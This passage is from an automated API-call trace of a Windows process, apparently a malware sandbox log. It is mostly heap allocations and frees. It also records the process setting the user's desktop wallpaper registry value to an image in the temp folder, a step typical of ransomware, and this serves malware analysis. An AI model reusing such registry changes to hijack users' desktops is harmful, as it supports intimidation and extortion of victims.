hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0261.246] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0261.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0261.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0261.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0261.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0261.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0261.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0261.254] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0261.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0261.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0261.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0261.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0261.257] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaa80 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0261.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0261.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0261.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0261.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa80 | out: hHeap=0x2af0000) returned 1 [0261.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0261.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0261.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0261.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0261.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73568 [0261.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0261.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0261.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0261.264] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0261.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0261.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0261.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0261.266] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0261.267] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0261.338] RegCloseKey (hKey=0x3c0) returned 0x0 [0261.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0261.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0261.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0261.339] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0261.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0261.340] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0261.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0261.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0261.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0261.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0261.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0261.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0261.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0261.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0261.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0261.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0261.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0261.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0261.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0261.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0261.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0261.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0261.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0261.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0261.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0261.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0261.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0261.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0261.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0261.350] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0261.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0261.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0261.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0261.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0261.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0261.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0261.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0261.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0261.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0261.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0261.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0261.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0261.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 